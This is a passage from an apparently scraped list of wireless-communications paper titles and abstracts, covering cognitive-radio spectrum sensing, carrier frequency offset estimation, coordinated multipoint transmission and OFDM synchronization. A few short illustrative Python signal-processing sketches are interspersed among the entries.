systems. This paper surveys the fundamental capacity limits and associated trans- mission techniques for different wireless network design paradigms based on this promising technology. These para- digms are unified by the definition of a cognitive radio as an intelligent wireless communication device that exploits side information about its environment to improve spectrum utilization. This side information typically comprises knowl- edge about the activity, channels, codebooks, and/or messages of other nodes with which the cognitive node shares the spectrum. Based on the nature of the available side information as well as a priori rules about spectrum usage, cognitive radio systems seek to underlay, overlay, or interweave the cognitive radios' signals with the transmissions of noncognitive nodes. We provide a comprehensive summary of the known capacity characterizations in terms of upper and lower bounds for each of these three approaches. The increase in system degrees of freedom obtained through cognitive radios is also illuminated. This information-theoretic survey provides guidelines for the spectral efficiency gains possible through cognitive radios, as well as practical design ideas to mitigate the coexistence challenges in today's crowded spectrum. --- paper_title: A Low-Delay Low-Complexity EKF Design for Joint Channel and CFO Estimation in Multi-User Cognitive Communications paper_content: Parameter estimation in cognitive communications can be formulated as a multi-user estimation problem, which is solvable under maximum likelihood solution but involves high computational complexity. This paper presents a time-sharing and interference mitigation based EKF (Extended Kalman Filter) design for joint CFO (carrier frequency offset) and channel estimation at multiple cognitive users. 
The key objective is to realize low implementation complexity by decomposing high-dimensional parameters into multiple separate low-dimensional estimation problems, which can be solved in a time-shared manner via pipelining. We first present a basic EKF design that estimates the parameters from one TX user to one RX antenna. Then such a basic design is time-shared and reused to estimate parameters from multiple TX users to multiple RX antennas. Meanwhile, we use an interference mitigation module to cancel the co-channel interference at each RX sample. In addition, we further propose an adaptive noise variance tracking module to improve the estimation performance. The proposed design enjoys low delay and low buffer size (because of its online real-time processing), as well as low implementation complexity (because of the time-sharing and pipelining design). Its estimation performance is verified to be close to the Cramer-Rao bound. --- paper_title: Sensing orthogonal frequency division multiplexing systems for cognitive radio with cyclic prefix and pilot tones paper_content: The detection of orthogonal frequency division multiplexing (OFDM) for cognitive radio is considered in this paper. A frequency-selective fading channel is considered and the receiving process is modeled with timing and frequency offsets. Firstly, the authors propose a new decision statistic based on time-domain cross-correlation of the cyclic prefix (CP) embedded in OFDM signals. The probability distribution functions (PDFs) of the statistics under both hypotheses of primary signal absence and presence are derived. Estimation of the timing and frequency offset is obtained through the maximum likelihood method and the received signals are modified. Then another new decision statistic based on frequency-domain cross-correlation of the pilot tones (PTs) is proposed, whose PDF is also analyzed. Then, through the likelihood ratio test, the authors utilize CP and PT jointly and propose a global test statistic. The theoretical probabilities of false alarm (PFA) and detection are derived, and the theoretical threshold for any given PFA is proposed. The simulation results show that the proposed spectrum-sensing scheme has excellent performance, especially under very low signal-to-noise ratio (SNR). --- paper_title: Second-Order Cyclostationarity of Mobile WiMAX and LTE OFDM Signals and Application to Spectrum Awareness in Cognitive Radio Systems paper_content: Spectrum sensing and awareness are challenging requirements in cognitive radio (CR). To adequately adapt to the changing radio environment, it is necessary for the CR to detect the presence and classify the on-the-air signals. The wireless industry has shown great interest in orthogonal frequency division multiplexing (OFDM) technology. Hence, classification of OFDM signals has been intensively researched recently. Generic signals have been mainly considered, and there is a need to investigate OFDM standard signals, and their specific discriminating features for classification. In this paper, realistic and comprehensive mathematical models of the OFDM-based mobile Worldwide Interoperability for Microwave Access (WiMAX) and third-Generation Partnership Project Long Term Evolution (3GPP LTE) signals are developed, and their second-order cyclostationarity is studied. Closed-form expressions for the cyclic autocorrelation function (CAF) and cycle frequencies (CFs) of both signal types are derived, based on which an algorithm is proposed for their classification.
The proposed algorithm does not require carrier, waveform, and symbol timing recovery, and is immune to phase, frequency, and timing offsets. The classification performance of the algorithm is investigated versus signal-to-noise ratio (SNR), for diverse observation intervals and channel conditions. In addition, the computational complexity is explored versus the signal type. Simulation results show the efficiency of the algorithm in terms of classification performance, and the complexity study proves the real-time applicability of the algorithm. --- paper_title: Eigenvalue-Based Spectrum Sensing of Orthogonal Space-Time Block Coded Signals paper_content: We consider spectrum sensing of signals encoded with an orthogonal space-time block code (OSTBC). We propose a CFAR detector based on knowledge of the eigenvalue multiplicities of the covariance matrix, which are inherent owing to the OSTBC, and derive theoretical performance bounds. In addition, we show that the proposed detector is robust to a carrier frequency offset, and propose a detector that deals with timing synchronization using the detector for the synchronized case as a building block. The proposed detectors are shown numerically to perform well. --- paper_title: Software Defined Radio Implementation of SMSE Based Overlay Cognitive Radio in High Mobility Environment paper_content: A spectrally modulated spectrally encoded (SMSE) based overlay cognitive radio has been implemented and demonstrated in [1] via GNU software defined radio (SDR). However, like most of the current cognitive radio implementations and demonstrations, this work does not consider the mobility between cognitive radio nodes. In a high mobility environment, the frequency offset introduced by Doppler shift leads to loss of the orthogonality among subcarriers. As a direct result, severe inter-carrier interference (ICI) and performance degradation is observed. In our previous work, we have proposed a new ICI cancellation method (namely Total ICI Cancellation) for OFDM [2] and MC-CDMA [3] mobile communication systems, which eliminates the ICI without lowering the transmission rate or reducing the bandwidth efficiency. In this paper, we apply the total ICI cancellation algorithm to the SMSE based overlay cognitive radio to demonstrate a high performance cognitive radio in a high mobility environment. Specifically, we demonstrate an SMSE based overlay cognitive radio that is capable of detecting primary users in real time and adaptively adjusting its transmission parameters to avoid interference to (and from) primary users. When the primary user transmission changes, the cognitive radio dynamically adjusts its transmission accordingly. Additionally, this cognitive radio maintains seamless real time video transmission between the cognitive radio pair even when large frequency offset is introduced by mobility between CR transmitter and receiver. --- paper_title: Blind spectrum sensing in cognitive radio over fading channels and frequency offsets paper_content: This paper deals with the problem of spectrum sensing in cognitive radio. We consider a stochastic system model where the Primary User (PU) transmits a periodic signal over fading channels. The effect of frequency offsets due to oscillator mismatch and Doppler offset is studied. We show that for this case the Likelihood Ratio Test (LRT) cannot be evaluated pointwise. We present a novel approach to approximate the marginalisation of the frequency offset using a single point estimate.
This is obtained via a low complexity Constrained Adaptive Notch Filter (CANF) to estimate the frequency offset. Performance is evaluated via numerical simulations and it is shown that the proposed spectrum sensing scheme can achieve the same performance as the “near-optimal” scheme, that is based on a bank of matched filters, using only a fraction of the complexity required. --- paper_title: Carrier frequency offset estimation for non-contiguous OFDM receiver in cognitive radio systems paper_content: For non-contiguous (NC) OFDM based cognitive radio (CR) systems, schemes have been developed in literature to acquire spectrum synchronization information (SSI) with perfect carrier frequency offset (CFO) synchronization. However, OFDM is extremely sensitive to the CFO in practice, which leads to inter-carrier interference (ICI), hence degrading the spectrum synchronization performance for existing schemes. An accurate CFO estimation is therefore required before setting up the SSI. In this paper, we present a novel scheme based on the maximum likelihood (ML) algorithm to estimate the CFO for the NC-OFDM receiver when the SSI is unknown. A corresponding Cramer-Rao lower bound (CRB) with the ideal SSI is derived to demonstrate the efficiency of the proposed scheme. Simulation results show that the proposed scheme is robust against interference and achieves a satisfactory accuracy of estimation, which is close to the relevant CRB. --- paper_title: Optimizing Wideband Cyclostationary Spectrum Sensing Under Receiver Impairments paper_content: In the context of Cognitive Radios (CRs), cyclostationary detection of primary users (PUs) is regarded as a common method for spectrum sensing. Cyclostationary detectors rely on the knowledge of the signal's symbol rate, carrier frequency, and modulation class in order to detect the present cyclic features. Cyclic frequency and sampling clock offsets are the two receiver impairments considered in this work. Cyclic frequency offsets, which occur due to oscillator frequency offsets, Doppler shifts, or imperfect knowledge of the cyclic frequencies, result in computing the test statistic at an offset from the true cyclic frequency. In this paper, we analyze the effect of cyclic frequency offsets on conventional cyclostationary detection, and propose a new multi-frame test statistic that reduces the degradation due to cyclic frequency offsets. Due to the multi-frame processing of the proposed statistic, non-coherent integration might occur across frames. Through an optimization framework developed in this work that can be performed offline, we determine the best frame length that maximizes the average detection performance of the proposed cyclostationary detection method given the statistical distributions of the receiver impairments. As a result of the optimization, the proposed detectors is shown to achieve the performance gains over conventional detectors given the constrained sensing time. We derive the proposed detector's theoretical average detection performance, and compare it to the performance of the conventional cyclostationary detector. Our analysis shows that gains in average detection performance using the proposed method can be achieved when the effect of sampling clock offset is less severe than that of the cyclic frequency offset. The analysis given in this paper can be used as a design guideline for practical implementation of cyclostationary spectrum sensors. 
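To make the cyclic-feature test in the preceding abstract concrete, the following sketch estimates the cyclic autocorrelation of a received block on a small grid of candidate cyclic frequencies around the nominal value, so that a residual cyclic-frequency offset does not wipe out the feature. This is only an illustrative toy (it is not the multi-frame statistic of the cited work), and the function names, grid size, and threshold are assumptions made for the example; in practice the threshold would be calibrated to a target false-alarm probability.

```python
# Illustrative sketch (assumed names/parameters): cyclic-autocorrelation detector
# that tolerates a small cyclic-frequency offset by scanning a grid of candidates.
import numpy as np

def caf_statistic(x, alpha, tau):
    """|R_x^alpha(tau)| estimated from complex baseband samples x.
    alpha is the cyclic frequency normalized to the sampling rate (cycles/sample)."""
    n = np.arange(tau, len(x))
    r = np.mean(x[n] * np.conj(x[n - tau]) * np.exp(-2j * np.pi * alpha * n))
    return np.abs(r)

def cyclo_detect(x, alpha0, tau, max_offset, n_grid=11, threshold=0.1):
    """Scan candidate cyclic frequencies in [alpha0-max_offset, alpha0+max_offset]
    and compare the largest statistic against a pre-calibrated threshold."""
    grid = alpha0 + np.linspace(-max_offset, max_offset, n_grid)
    stats = np.array([caf_statistic(x, a, tau) for a in grid])
    k = int(np.argmax(stats))
    return stats[k] > threshold, grid[k]
```

Scanning a small grid buys robustness to the offset at a modest computational cost, which mirrors the robustness goal that the cited detector pursues more systematically.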
--- paper_title: Iterative Blind OFDM Parameter Estimation and Synchronization for Cognitive Radio Systems paper_content: An iterative design method for Orthogonal Frequency Division Multiplexing (OFDM) system parameter estimation and synchronization under a blind scenario for cognitive radio systems is proposed in this paper. A novel envelope spectrum-based arbitrary oversampling ratio estimator is presented first, based on which the algorithms are then developed to provide the identification of other OFDM parameters (number of subcarriers, cyclic prefix (CP) length). Carrier frequency offset (CFO) and timing offset are estimated for the purpose of synchronization with the help of the identified parameters. An iterative scheme is employed to increase the estimation accuracy. To validate the proposed design, the performance is evaluated under an experimental propagation environment and the results show that the proposed design is capable of adapting blind parameter estimation and synchronization for cognitive radio with improved performance. --- paper_title: Joint Frequency Synchronization and Spectrum Occupancy Characterization in OFDM-Based Cognitive Radio Systems paper_content: OFDM-based cognitive radio (CR) systems are shown to be an effective solution for increasing spectrum efficiency by activating a certain group of subcarriers (subbands) in the locally available spectrum. However, each CR receiver should synchronize itself to the appropriate carrier frequency and identify the currently activated subbands. Moreover, the energy and bandwidth efficiency of CR systems can be improved if each CR can provide additional characterization of the local spectral content. In this paper, a novel joint frequency synchronization and spectrum occupancy characterization method for OFDM-based CR systems is proposed. The synchronization preamble structure is appropriately modified in order to efficiently perform frequency offset estimation, to identify occupied subbands, and, finally, to provide SNR and interference power estimates as reliable quantitative indicators of spectrum occupancy. The performance of the proposed method is evaluated for different amounts of spectrum occupancy and interference levels. --- paper_title: Spectrum Sensing for OFDM Signals Using Pilot Induced Auto-Correlations paper_content: Orthogonal frequency division multiplex (OFDM) has been widely used in various wireless communications systems. Thus the detection of OFDM signals is of significant importance in cognitive radio and other spectrum sharing systems. A common feature of OFDM in many popular standards is that some pilot subcarriers repeat periodically after certain OFDM blocks. In this paper, sensing methods for OFDM signals are proposed by using such a repetition structure of the pilots. Firstly, special properties for the auto-correlation (AC) of the received signals are identified, from which the optimal likelihood ratio test (LRT) is derived. However, this method requires the knowledge of channel information, carrier frequency offset (CFO) and noise power. To make the LRT method practical, we then propose an approximated LRT (ALRT) method that does not rely on the channel information and noise power, so that the CFO is the only remaining obstacle to the ALRT. To handle the problem, we propose a method to estimate the composite CFO and compensate its effect in the AC using multiple taps of ACs of the received signals.
Computer simulations have shown that the proposed sensing methods are robust to frequency offset, noise power uncertainty, time delay uncertainty, and frequency selectiveness of the channel. --- paper_title: Interference mitigation techniques for asynchronous multiple access communications in SIMO FBMC systems paper_content: In this paper we derive linear equalizers for FBMC systems. We focus on the multiple access channel where signals transmitted by different users may have different carrier frequency offsets and time delays. Aiming at reducing the bandwidth requirements of the periodic ranging messages we formulate two SIMO solutions that are tolerant to time and frequency misalignments. Simulation-based results show that the same performance can be achieved in the BER range [10^-2, 10^-4] in comparison to an OFDM multi-user minimum mean square error receiver. Considering a guard interval between users, the BER range in which FBMC and OFDM perform equally can be broadened. However, the OFDM solution requires a complexity 8.6 times higher and its spectral efficiency is reduced by 0.72 b/s/Hz due to the cyclic prefix. --- paper_title: Cooperative Space-Time Coded OFDM with Timing Errors and Carrier Frequency Offsets paper_content: The use of distributed space-time codes in cooperative communications promises to increase the rate and reliability of data transmission. These gains were mostly demonstrated for ideal scenarios, where all nodes are perfectly synchronized. Considering a cooperative uplink scenario with asynchronous nodes, the system suffers from two effects: timing errors and individual carrier frequency offsets. In effect, timing errors can completely cancel the advantages introduced by space-time codes, while individual carrier frequency offsets provide a great challenge to receivers. Indeed, frequency offsets are perceived as a time-variant channel (even if the individual links are static) in distributed cooperative communications. We show that using OFDM, space-time codes (STCs) become tolerant to timing errors. Channel estimation and tracking takes care of frequency offsets. Our simulations demonstrate that the bit error rate performance improves by an order of magnitude, when using a cooperative system design, which takes these two effects into account. --- paper_title: A Novel Initial Cell Search Scheme in TD-LTE paper_content: In LTE system, in order to access the network, user equipment (UE) should detect the primary synchronization signal (PSS) and secondary synchronization signal (SSS) in downlink (DL) signal from the surrounding base stations (BS). This paper presents a novel initial cell search (ICS) scheme in TD-LTE system that contains two steps. In the first step, modified normalization based PSS detection is proposed to combat carrier frequency offset (CFO) and uplink (UL) interference. After CFO estimation and compensation, coherent SSS detection is adopted in frequency domain in the second period. Furthermore, in order to combat channel fading and noise, a method of flexible combination of PSS and SSS within several frames is proposed. Simulation results demonstrate that the proposed scheme is more robust and effective than conventional approaches in TDD system. --- paper_title: A Simplified MMSE Equalizer for Distributed TR-STBC Systems with Multiple CFOs paper_content: In distributed wireless systems, the traditional carrier frequency offset (CFO) compensation methods may not be applied due to the existence of multiple CFOs.
In this paper, we address the equalization issue for distributed time-reversal space-time block coded (TR-STBC) systems when multiple CFOs are present. A simplified minimum mean-square error (MMSE) equalizer is proposed, which exploits the nearly-banded structure of the channel matrices and utilizes the LDL^H factorization to reduce the computational complexity. Simulation results show that the proposed equalizer can achieve similar performance to the traditional MMSE equalizer while possessing much less complexity. --- paper_title: Simultaneous Multiple Carrier Frequency Offsets Estimation for Coordinated Multi-Point Transmission in OFDM Systems paper_content: Orthogonal frequency division multiplexing (OFDM) combined with the coordinated multi-point (CoMP) transmission technique has been proposed to improve the performance of receivers located at the cell border. However, the inevitable carrier frequency offset (CFO) will destroy the orthogonality between subcarriers and induce strong inter-carrier interference (ICI) in OFDM systems. In a CoMP-OFDM system, the impact of CFO is more severe because of the mismatch in carrier frequencies among multiple transmitters. To reduce performance degradation, CFO estimation and compensation is essential. For simultaneous estimation of multiple CFOs, the performance of conventional CFO estimation schemes is significantly degraded by the mutual interference among the signals from different transmitters. In this work, our goal is to propose an effective approach that can simultaneously estimate multiple CFOs in the downlink by using the composite signal coming from multiple base stations corresponding to CoMP transmission. Based on the Zadoff-Chu sequences, we design an optimal set of training sequences, which minimizes the mutual interference and is robust to the variations in multiple CFOs. Then, we propose a maximum likelihood (ML)-based estimator, the robust multi-CFO estimation (RMCE) scheme, for simultaneous estimation of multiple CFOs. In addition, by incorporating iterative interference cancellation into the RMCE scheme, we propose an iterative scheme to further improve the estimation performance. According to the simulations, our scheme can eliminate the mutual interference effectively, approaching the Cramer-Rao bound performance. --- paper_title: A Joint Channel and Frequency Offset Estimator for the Downlink of Coordinated MIMO-OFDM Systems paper_content: The issues of frequency offset and channel estimation are considered for the downlink of coordinated multiple-input multiple-output orthogonal frequency-division multiplexing systems. Multiple carrier frequency offsets exist in this coordinated system. Without implementing an appropriate compensation for these offsets, both inter-carrier and inter-cell interference will degrade the system performance. Here, we adopt a parallel interference cancelation strategy to iteratively mitigate inter-cell interference, and propose a frequency offset estimator, approximated by a Hadamard product and a Taylor series expansion, to eliminate the inter-carrier interference. Our scheme is significantly less complex than existing methods. Furthermore, the proposed channel estimator is robust to frequency offsets and performs comparably well to these conventional approaches.
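The joint CFO-and-channel estimation idea running through the preceding CoMP abstracts can be illustrated with a deliberately simplified single-link sketch: derotate a received pilot block with a candidate CFO, fit a short multipath channel by least squares, and keep the candidate with the smallest residual. This is a hedged toy version only; it does not implement the Hadamard-product/Taylor-series approximation or the interference cancellation of the cited estimators, and all names and parameters below are assumptions made for the example.

```python
# Minimal joint CFO/channel estimation sketch (single link, known pilot symbols).
import numpy as np

def joint_cfo_channel_ls(y, pilot_freq, n_fft, n_taps, cfo_grid):
    """y: one received OFDM symbol (time domain, length >= n_fft, CP removed).
    pilot_freq: known frequency-domain pilot symbols on all n_fft subcarriers.
    Returns (cfo_hat, h_hat) with h_hat the n_taps-tap time-domain channel."""
    n = np.arange(n_fft)
    # DFT matrix restricted to the first n_taps delays: Y = diag(P) F h + noise
    F = np.exp(-2j * np.pi * np.outer(n, np.arange(n_taps)) / n_fft)
    best_res, cfo_hat, h_hat = np.inf, None, None
    for eps in cfo_grid:                      # eps: candidate CFO in subcarrier spacings
        y_corr = y[:n_fft] * np.exp(-2j * np.pi * eps * n / n_fft)   # derotate
        Y = np.fft.fft(y_corr)
        A = pilot_freq[:, None] * F
        h, *_ = np.linalg.lstsq(A, Y, rcond=None)
        res = np.linalg.norm(Y - A @ h)
        if res < best_res:
            best_res, cfo_hat, h_hat = res, eps, h
    return cfo_hat, h_hat
```

Constraining the channel to n_taps delays is what makes the residual informative: an unconstrained per-subcarrier estimate would fit any candidate CFO equally well.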
--- paper_title: An Enhanced Signal-Timing-Offset Compensation Algorithm for Coordinated Multipoint-to-Multiuser Systems paper_content: In coordinated multipoint-to-multiuser systems, since coordinated base stations (BSs) may transmit their signals simultaneously to multiple user equipments (UEs) and a UE may receive signals with different signal timing offsets (STOs) from different BSs at given time-slots and subcarriers, it is impossible for BSs to pre-compensate or for UEs to post-compensate the STOs as they do it in multipoint-to-user or point-to-multiuser systems, respectively. In this letter, we convince by demonstrations that the STOs cannot be completely eliminated by any compensation algorithm. In addition, we propose a novel STO compensation algorithm associated with tolerant residual STOs to minimize the STOs, and discuss in details how to calculate the pre-compensation vector at BSs. Simulation results indicate that the proposed algorithm is capable of mitigating the STOs effectively to tolerable values, and outperforms state of the art approaches. --- paper_title: Channel Estimation and Equalization for Asynchronous Single Frequency Networks paper_content: Single carrier frequency-domain equalization (SC-FDE) modulations are known to be suitable for broadband wireless communications due to their robustness against severe time-dispersion effects and the relatively low envelope fluctuations of the transmitted signals. In this paper, we consider the use of SC-FDE schemes in broadcasting systems. A single frequency network transmission is assumed, and we study the impact of distinct carrier frequency offset (CFO) between the local oscillator at each transmitter and the local oscillator at the receiver. We propose an efficient method for estimating the channel frequency response and CFO associated to each transmitter and propose receiver structures able to compensate the equivalent channel variations due to different CFO for different transmitters. Our performance results show that we can have excellent performance, even when transmitters have substantially different frequency offsets. --- paper_title: Universal-filtered multi-carrier technique for wireless systems beyond LTE paper_content: In this paper, we propose a multi-carrier transmission scheme to overcome the problem of intercarrier interference (ICI) in orthogonal frequency division multiplexing (OFDM) systems. In the proposed scheme, called universal-filtered multi-carrier (UFMC), a filtering operation is applied to a group of consecutive subcarriers (e.g. a given allocation of a single user) in order to reduce out-of-band sidelobe levels and subsequently minimize the potential ICI between adjacent users in case of asynchronous transmissions. We consider a coordinated multi-point (CoMP) reception technique, where a number of base stations (BSs) send the received signals from user equipments (UEs) to a CoMP central unit (CCU) for joint detection and processing. We examine the impact of carrier frequency offset (CFO) on the performance of the proposed scheme and compare the results with the performance of cyclic prefix based orthogonal frequency division multiplexing (CP-OFDM) systems. We use computer experiments to illustrate the efficiency of the proposed multi-carrier scheme. The results indicate that the UFMC scheme outperforms the OFDM for both perfect and non-perfect frequency synchronization between the UEs and BSs. 
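As a rough illustration of the universal-filtered multi-carrier idea described immediately above, the sketch below modulates each contiguous block of subcarriers with its own IFFT and passes it through a per-subband FIR filter before summing the subband signals. A Hamming-windowed prototype is used only to keep the example self-contained; UFMC proposals typically use a Dolph-Chebyshev filter, and the function name and parameters are illustrative assumptions.

```python
# Toy UFMC transmitter: per-subband IFFT followed by a per-subband FIR filter.
import numpy as np

def ufmc_modulate(symbol_blocks, subband_indices, n_fft=64, filt_len=16):
    """symbol_blocks[i] holds the data symbols for the subcarriers listed in
    subband_indices[i]. Returns a time-domain signal of length n_fft+filt_len-1."""
    proto = np.hamming(filt_len)                       # stand-in prototype filter
    out = np.zeros(n_fft + filt_len - 1, dtype=complex)
    for syms, idx in zip(symbol_blocks, subband_indices):
        idx = np.asarray(list(idx))
        X = np.zeros(n_fft, dtype=complex)
        X[idx] = syms
        x = np.fft.ifft(X)                             # subband IFFT
        # shift the prototype to the subband centre before filtering
        shift = np.exp(2j * np.pi * idx.mean() * np.arange(filt_len) / n_fft)
        out += np.convolve(x, proto * shift)           # filter and superpose
    return out

# Example: two 4-subcarrier blocks on an assumed 64-point grid.
tx = ufmc_modulate([np.array([1, -1, 1, 1]), np.array([1, 1, -1, -1])],
                   [range(4, 8), range(20, 24)])
```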
--- paper_title: Space-time coding for time and frequency asynchronous CoMP transmissions paper_content: This paper deals with time and frequency offset in coordinated multipoint (CoMP) transmission/reception networks by using distributed linear convolutional space-time coding (DLC-STC). We first prove that perfect time synchronization is impractical for CoMP transmission/reception networks. Then the DLC-STC scheme, in which exact time synchronization at the relay nodes is unnecessary, is proposed for the CoMP joint processing mode (CoMP-JP). Finally, we show the detecting method by minimum mean-squared error decision-feedback equalizer (MMSE-DFE) receivers with any frequency offsets. Simulation results show that with MMSE-DFE receivers, the proposed DLC-STC scheme outperforms the delay diversity scheme and the MMSE-DFE receivers can achieve the same diversity orders as the maximum likelihood sequence detection (MLSD) receivers. --- paper_title: Coordinated Multi-Cell Systems: Carrier Frequency Offset Estimation and Correction paper_content: We consider a coordinated multi-cell (CMC) system and the associated problem of independent carrier frequency offsets (CFOs) at the basestations (BSs). These BS CFOs cause accumulated phase errors that compromise downlink beamforming accuracy, and consequently degrade the spectral efficiency of the CMC system. Since the inherent structure of coordinated downlink beamforming techniques makes it impossible to correct for the BS CFOs at the mobile subscriber (MS), our topic is estimation and correction of the BS CFOs at the BSs. Our method begins with the formation of MS-side estimates of the BS CFOs, which are then fed back to the coordinated BSs. We then derive an optimum maximum likelihood (ML) estimator for the BS CFOs that uses independent MS-side CFO estimates and average channel signal-to-noise ratios. However, it is demonstrated that the CFOs of the MSs themselves introduce a bias to the optimal BS CFO estimator. To compensate for this bias, a joint BS and MS CFO estimator is derived, but shown both to require high computation and have rank deficiency. This motivates an improved technique that removes the rank problem and employs successive estimation to reduce computation. It is demonstrated to overcome the MS CFO bias and efficiently solve the joint BS and MS CFO problem in systems that have low to moderate shadowing. We term the full BS CFO estimation and correction procedure "BS CFO tightening". --- paper_title: Low-Complexity Semiblind Multi-CFO Estimation and ICA-Based Equalization for CoMP OFDM Systems paper_content: We propose a low-complexity semiblind structure with multiple-carrier-frequency-offset (CFO) estimation and independent component analysis (ICA)-based equalization for multiuser coordinated multipoint (CoMP) orthogonal frequency-division-multiplexing (OFDM) systems. A short pilot is carefully designed for each user and has a twofold advantage. On the one hand, using the pilot structure, a complex multidimensional search for multiple CFOs is divided into a number of low-complexity monodimensional searches. On the other hand, the cross correlations between the transmitted and the received pilots are explored to allow simultaneous elimination of permutation ambiguity and quadrant ambiguity in the ICA equalized signals. 
Simulation results show that with a low training overhead of 1.6%, the proposed semiblind system not only outperforms the existing multi-CFO estimation schemes in terms of bit error rate (BER) and mean square error (MSE) of multi-CFO estimation but achieves a BER performance close to the ideal case with perfect channel state information (CSI) and no CFO at the receiver as well. --- paper_title: Estimation of Time and Frequency Offsets in LTE Coordinated Multi-Point Transmission paper_content: We address the impact, estimation and compensation of time and frequency offsets in LTE CoMP. In LTE CoMP, transmissions may come from a different transmission point in every subframe of one millisecond. Due to propagation delay differences and time-frequency synchronization imperfections between the transmission points, the user equipment (UE) receiver is thus exposed to different time- frequency offsets in every subframe. In this paper we illustrate both analytically and numerically the impact of these time and frequency offsets on channel estimation performance and finally on LTE CoMP link-level demodulation performance. Furthermore, we study the applicability of existing LTE reference signals to the time-frequency offset estimation problem. In particular we compare two approaches in which the UE is either aware or unaware of the exact transmission point. Finally, we show with LTE link-level simulations that using the proposed approaches the impacts of time-frequency offsets can be almost perfectly compensated. --- paper_title: Coordinated multipoint transmission and reception in LTE-advanced: deployment scenarios and operational challenges paper_content: 3GPP has completed a study on coordinated multipoint transmission and reception techniques to facilitate cooperative communications across multiple transmission and reception points (e.g., cells) for the LTE-Advanced system. In CoMP operation, multiple points coordinate with each other in such a way that the transmission signals from/to other points do not incur serious interference or even can be exploited as a meaningful signal. The goal of the study is to evaluate the potential performance benefits of CoMP techniques and the implementation aspects including the complexity of the standards support for CoMP. This article discusses some of the deployment scenarios in which CoMP techniques will likely be most beneficial and provides an overview of CoMP schemes that might be supported in LTE-Advanced given the modern silicon/DSP technologies and backhaul designs available today. In addition, practical implementation and operational challenges are discussed. We also assess the performance benefits of CoMP in these deployment scenarios with traffic varying from low to high load. --- paper_title: Feedback Generation for CoMP Transmission in Unsynchronized Networks with Timing Offset paper_content: Coordinated multipoint (CoMP) transmission is a promising technique in long term evolution (LTE) systems to provide coverage and broadband communication for cell edge user equipments (UEs). However, as signals from multiple transmitters may reach the UE at different times, CoMP networks might experience high time offsets, leading to significant performance loss in closed-loop transmission. In this paper we show that spacing between reference signals (RSs) imposes a phase offset on the transmit covariance matrix in presence of timing offset (TO), affecting the feedback generation. 
The promised advantages of closed-loop CoMP transmission vanish in presence of TO due to improper precoding matrix index (PMI) selection. Keeping the phase shift close to zero, reliable PMI selection can be guaranteed and as a result near optimum performance is achieved for closed-loop CoMP transmission in unsynchronized networks with TO present. --- paper_title: Efficient Phase-Error Suppression for Multiband OFDM-Based UWB Systems paper_content: This paper proposes an efficient phase-error suppression scheme for multiband (MB) orthogonal frequency-division multiplexing (OFDM)-based ultrawideband (UWB) communication systems. The proposed scheme consists of a clock-recovery loop and a common phase-error (CPE) tracking loop. The clock-recovery loop performs estimation of the sampling frequency offset (SFO) and its 2-D (time and frequency) compensation, while the CPE tracking loop estimates and corrects the phase errors caused by residual carrier frequency offset (CFO), residual SFO, and phase noise (PHN). The SFO and CPE estimators employ pilot-tone-based and channel-frequency-response (CFR)-weighted low-complexity approaches, each of which uses a robust error-reduction scheme without using angle calculations or divisions. Analytical results and numerical examples show the effectiveness of the proposed scheme in different multipath fading scenarios and signal-to-noise ratio (SNR) regimes. --- paper_title: A non-coherent neighbor cell search scheme for LTE/LTE-A systems paper_content: A new neighbor cell search algorithm for LTE/LTE-A systems is presented in this paper. To improve the interference problem in channel estimation for coherent SSS detection in the conventional neighbor cell search approaches, we propose a non-coherent scheme that takes advantage of the similarity of channel responses at adjacent subcarriers. The proposed neighbor cell search procedure not only includes both PSS and SSS detection, but also can combat different carrier frequency offsets that the home cell signal and the neighbor cell signal may suffer. The removal of the home cell synchronization signals in our algorithm converts the neighbor cell PSS and SSS into new sequences for recognition, respectively. By examining the cross-correlation properties of the new sequences, we show that partial correlation can well detect the neighbor cell sector ID and group ID through the new sequences. From simulation results, it is also clear that the proposed algorithm has good detection results and outperforms the conventional coherent approaches. --- paper_title: Sequence Designs for Interference Mitigation in Multi-Cell Networks paper_content: We propose a training sequence that can be used at the handshaking stage for multi-cell networks. The proposed sequence is theoretically proved to enjoy several nice properties including constant amplitude, zero autocorrelation, and orthogonality in multipath channels. Moreover, the analytical results show that the proposed sequence can greatly reduce the multi-cell interference (MCI) induced by carrier frequency offset (CFO) to a negligible level. Therefore, the CFO estimation algorithms designed for single-user or single-cell environments can be slightly modified, and applied in multi-cell environments; an example is given for showing how to modify the estimation algorithms. Consequently, the computational complexity can be dramatically reduced. 
Simulation results show that the proposed sequences and the CFO estimation algorithms outperform conventional schemes in multi-cell environments. --- paper_title: Resource Block Basis MMSE Beamforming for Interference Suppression in LTE Uplink paper_content: This paper proposes a new method to suppress interference using antenna array for LTE uplink. The proposed method does not require knowledge on resource allocation of either interfering or communicating mobile stations, and thus it has a significant advantage of ease of implementation. An additional advantage of this method is parallelization and scalability for multi-core processing. This paper also proposes a novel iterative timing offset compensation to enable effective interference suppression. The proposed method has been successfully implemented on System-on-Chip consisting of multi-core DSP and ARM microprocessors and verified that it successfully suppresses interference in real time. --- paper_title: Robust carrier frequency offset and channel estimation for orthogonal frequency division multiple access downlink systems in the presence of severe adjacent-cell interference paper_content: This study investigates joint estimation carrier frequency offset (CFO) and channel impulse response (CIR) in the problematic orthogonal frequency division multiple access (OFDMA) downlink scenario at the cell boundary, where a maximum supposition of three adjacent base stations preambles can be received. A novel scheme is proposed for estimating the CFOs and CIRs of different cells. First, the highly efficient joint maximum-likelihood (JML) algorithm is used to enable robust CFO estimation by exploiting the idempotent property of the projection matrix. Next, in order to estimate the precise CIR, the composite CFO-based and circularly shifted preamble signatures are proposed by applying the constrained minimum variance (CMV) algorithm to suppress adjacent-cell interference. Finally, the CFO and CIR estimations are enhanced by an iterative cancellation scheme. To the best of the authors research, there is no publication study proposed joint JML-CFO and CMV-CIR estimators for OFDMA downlink systems with adjacent-cell interference. Simulation results show that the proposed algorithms provide better performance than the conventional estimators and approach the theoretical Cramer–Rao lower bound at the cell boundary over frequency-selective fading channels. --- paper_title: Synchronization, Channel Estimation, and Equalization in MB-OFDM Systems paper_content: This paper addresses preamble-based low complexity synchronization, channel estimation and equalization for Zero-padded (ZP) MB-OFDM based UWB systems. The proposed synchronization method consists of sync detection, coarse timing estimation, fine timing estimation, and oscillator frequency offset estimation. The distinctive features of MB-OFDM systems and the interplay between the timing and carrier frequency hopping at the receiver are judiciously incorporated in the proposed synchronization method. In order to apply the low complexity one-tap frequency-domain equalizer, the required circular convolution property of the received signal is obtained by means of an overlap-add method after the frequency offset compensation. The proposed low complexity channel estimator for each band is developed by first averaging the over-lapadded received preamble symbols within the same band and then applying time-domain least-squares 